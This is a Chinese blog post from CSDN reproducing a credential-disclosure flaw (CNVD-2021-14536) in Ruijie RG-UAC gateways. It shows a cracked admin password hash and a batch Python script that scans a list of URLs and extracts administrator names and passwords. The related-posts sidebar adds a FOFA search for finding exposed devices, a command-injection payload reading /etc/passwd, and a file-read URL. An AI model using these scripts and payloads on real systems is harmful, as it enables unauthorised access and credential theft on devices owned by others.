复现锐捷RG-UAC系统账号密码信息泄露漏洞编写poc/exp(CNVD-2021-14536)

最新推荐文章于 2023-10-29 14:43:34 发布
最新推荐文章于 2023-10-29 14:43:34 发布
阅读量783 收藏
点赞数
分类专栏: 渗透测试 文章标签: python 安全 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/p_utao/article/details/115581395
版权

漏洞演示

访问地址
在这里插入图片描述
f12查看源代码
在这里插入图片描述
md5解码:

md5加密解码
40b5daa2352b825d66b8080617408284reach123

在这里插入图片描述
登录成功
在这里插入图片描述

poc/exp验证

import requests
import re

def start(headers):
    with open("1.txt", "r") as f:
        for f1 in f:
            f2 = f1.strip()
            try:
                response = requests.get(url=f2, headers=headers)
                start1(response,f2)
            except Exception as e:
                print("[-]"+f2+"[+]"+"错误")
                
def start1(response,f2):
    if "super_admin" in response.text and "password" in response.text and response.status_code == 200:
        print("[-]" + f2 + "存在该漏洞"+ "[+]")
        html = response.text
        html1 = re.findall('.name":"(.*?)"', html)
        html2 = re.findall('.password":"(.*?)"', html)
        print(list(filter(None, html1)))
        print(list(filter(None, html2)))
        print("-" * 110)
    else:
        print("[-]" + f2 + "[+]" + "不存在该漏洞")
        
if __name__ == '__main__':
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36"
    }
    start(headers)

在这里插入图片描述

p_utao
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
锐捷 Smartweb管理系统密码信息泄漏漏洞
xiaokp7的博客
09-13 387
锐捷网络股份有限公司无线smartweb管理系统存在逻辑缺陷漏洞,攻击者可从漏洞获取到管理员账号密码,从而以管理员权限登录。
CNVD-2021-09650:锐捷NBR路由器(guestIsUp.php)RCE漏洞复现 [附POC]
最新发布
薛定谔嘚喵博客
11-15 1046
锐捷网络是一家拥有包括交换机、路由器、软件、安全防火墙、无线产品、存储等全系列的网络设备产品线及解决方案的专业化网络厂商。锐捷NBR 路由器系统存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限,导致服务器失陷。
代码审计-锐捷EG网关 管理员账号密码泄露漏洞
自强不息
10-29 837
各家兴便是天下大同
shopxo 文件读取(CNVD-2021-15822)
小小猪的博客
12-29 1万+
shopxo 文件读取(CNVD-2021-15822) 漏洞介绍: ShopXO是一套开源的企业级开源电子商务系统。 ShopXO存在任意文件读取漏洞,攻击者可利用该漏洞获取敏感信息 影响范围: ShopXO版本 环境搭建: 在线环境 地址 漏洞复现: 访问首页 进行burp抓包 将要访问的文件进行编码 构造poc GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1...
锐捷 NBR路由器 远程命令执行漏洞CNVD-2021-09650)
孤桜懶契
04-14 1万+
漏洞描述 i ⭐锐捷NBR路由器 EWEB网管系统部分接口存在命令注入,导致远程命令执行获取权限 漏洞影响 s ✅锐捷NBR路由器 EWEB网管系统 空间测绘 d ⭕FOFA:title="锐捷网络-EWEB网管系统" ⭕FOFA:icon_hash="-692947551" 漏洞复现 ✅访问首页 ✅执行Payload命令 POST /guest_auth/guestIsUp.php mac=1&ip=127.0.0.1|cat /etc/passwd > test.tx
锐捷RG-UAC 账户硬编码漏洞批量检测exp
06-17
-u 指定单个url -l 指定url文件 fofa搜索 title="RG-UAC登录页面" && body="admin",获取相关资产后保存到txt文件,然后使用此脚本批量检测
CNVD-2021-17369 smartweb管理系统管理员密码泄露.md
04-11
CNVD-2021-17369 smartweb管理系统管理员密码泄露
锐捷RG-MTFi-M520车载Wi-FI 32MB编程器固件RG- MTF1-M520-v1.1. bin-网管软件其他资源
06-11
锐捷RG-MTFi-M520是一款专为车载环境设计的Wi-Fi设备,它集成了先进的无线网络技术和管理功能,旨在提供稳定、高速的移动互联网接入服务。这款设备的固件更新对于优化性能、增强安全性以及修复潜在问题至关重要。在...
锐捷RG-MTFi-M520车载Wi-FI 32MB编程器固件RG- MTF1-M520-v1.1. bin-网管
06-12
锐捷RG-MTFi-M520是一款专为车载环境设计的Wi-Fi设备,它集成了先进的无线网络技术和管理功能,旨在提供稳定、高速的移动互联网接入服务。该设备的固件是其核心组成部分,负责控制硬件操作、处理数据传输以及实现...
锐捷RG-MTFi-M520车载Wi-Fi固件 32MB编程器固件
03-21
锐捷RG-MTFi-M520车载Wi-Fi固件是专门为车载无线网络设备设计的软件组件,它基于32MB编程器固件,确保了设备的高效稳定运行。在这个系统中,STM32(意法半导体的微控制器)扮演着核心角色,它是一款基于ARM架构的...
RuijieRCE:锐捷锐捷网络RCE突破检测工具,可批量检测
03-06
自述文件 瑞杰网络RCE漏洞检测工具,为方便渗透测试使用,可以批量检测,也会生成历史记录。同时也为防止他人恶意使用,可自定义GET参数密码,该密码由sha256加密,难以破解。 免责声明 由于传播,利用此文所提供的信息而造成的任何直接或间接的后果及损失,均由使用者本人负责,作者不承担任何责任。 参数 -f string 导入.txt文件批量扫描 -n string 自定义POST木马密码,默认cmd -p string 自定义GET密码验证,默认为cmd -u string 目标URL 使用 检测到防御后生成随机数.php文件执行命令,也可以上菜刀。 普通使用 GET密码:cmd POST密码:cmd ./RuijieRCE -u http://127.0.0.1:4430 设置密码 -n参数为POST密码,-p参数为GET密码这两
未配置远程桌面会话主机服务器的授权模式_漏洞预警 | A瑞捷网络交换机目录遍历漏洞;Ericom Access Server 9.2.0服务器端请求伪造漏洞...
weixin_39638014的博客
12-16 728
、、、漏洞预警A瑞捷网络交换机eWeb S29_RGOS 11.4 目录遍历漏洞漏洞信息锐捷网络作为中国国内最早的交换机厂商之一,经过多年的发展,形成了数据中心、园区网两大类别多个品类完善的交换机产品系列。当前,锐捷的Newton18000系列交换机为核心的极简网络已服务于无线城市、大型园区网、城市地铁等多个场景上千个网络,每天有数千万用户通过极简网络访问互联网。本次漏洞主要是是由于锐捷...
学习笔记-B/S - Exploits
热门推荐
人饭子的博客
11-02 2万+
B/S - Exploits 免责声明 本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关. 大纲 各类论坛/CMS框架 AEM 74CMS dedeCMS Discuz Discuz Discuz!ML Drupal ECshop Fastadmin Laravel jeecg jeewms Joomla Maccms MetIn...
锐捷RG-UAC统一上网行为管理审计系统账号密码信息泄露漏洞 CNVD-2021-14536
WgpSec狼组安全团队
03-08 1436
声明 本文作者:PeiQi 本文字数:1030 阅读时长:5~6分钟 附件/链接:点击查看原文下载 本文属于【狼组安全社区】原创奖励计划,未经许可禁止转载 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,狼组安全团队以及文章作者不为此承担任何责任。 狼组安全团队有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经狼组安全团队允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。 ..
CNVD-2021-14544 漏洞复现
尐猴子君ii的博客
03-28 4365
大四的生活忙忙碌碌,在绿盟实习和忙毕设,让我划水A了半年,今天写一下最近申请零组文库邀请码,提交的复现文章叭. 贵有恒何必三更眠五更起,最无益只怕一日曝十日寒 话不多说,快上车。 海康威视流媒体管理服务器任意文件读取(CNVD-2021-14544) 1.漏洞说明 海康威视是以视频为核心的智能物联网解决方案和大数据服务提供商。 杭州海康威视系统技术有限公司流媒体管理服务器存在弱口令漏洞和任意文件读取漏洞,攻击者可利用该漏洞获取敏感信息。 2.影响版本 杭州海康威视数字技术股份有限公司 流媒体管理服务器 V2
锐捷RG-UAC统一上网行为管理审计系统存在账号密码信息泄露
千寻的博客
04-24 1181
文章目录漏洞名称漏洞编号漏洞描述影响版本FOFA漏洞复现一(poc漏洞复现二第一步 登录页面第二步 按F12查看源码,可以发现账号和密码的md5形式第三步解密md5得到密码第四步 登录系统摘抄 漏洞名称 锐捷RG-UAC统一上网行为管理审计系统存在账号密码信息泄露 漏洞编号 CNVD-2021-14536 漏洞描述 锐捷RG-UAC统一上网行为管理审计系统存在账号密码信息泄露, 可以间接获取用户账号密码信息登录后台 影响版本 锐捷RG-UAC统一上网行为管理审计系统 FOFA title
锐捷RG-UAC同一上网行为管理(信息泄露漏洞复现)
weixin_45291045的博客
03-13 1726
构造url https://xxx.xxx.cn/get_dkey.php?user=admin 可看到该系统的超级管理员权限账号、访客权限账号 md5解密密码后即可登录
CNVD-2021-17369 -- 锐捷Smartweb管理系统 密码信息泄露漏洞
DUANYU23的博客
04-05 3056
锐捷Smartweb管理系统 密码信息泄露漏洞0X001前言0X002 漏洞影响0X003 漏洞原理0X004 漏洞复现0X041 空间搜索寻找目标0X042尝试弱口令登陆0X043查看数据发生的请求文件0X005 POC0X006 修复建议 0X001前言 锐捷网络股份有限公司无线smartweb管理系统存在逻辑缺陷漏洞,攻击者可从漏洞获取到管理员账号密码,从而以管理员权限登录。 0X002 漏洞影响 获取锐捷Smartweb管理系统权限。 0X003 漏洞原理 通过弱口令进入控制台,数据后发现请求了一个
锐捷RG-UAC上网行为管理信息泄漏漏洞
MD@@nr丫卡uer
03-17 1444
漏洞简介 锐捷RG-UAC上网行为管理信息泄漏漏洞,可在登陆界面源码中查找管理员用户和密码. 影响范围 锐捷RG-UAC上网行为管理与审计系统 fofa查询 title="RG-UAC登录页面" && body="admin" 漏洞利用 前端查看源码,搜索admin即可发现MD5加密的密码 通过解密 成功登陆 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值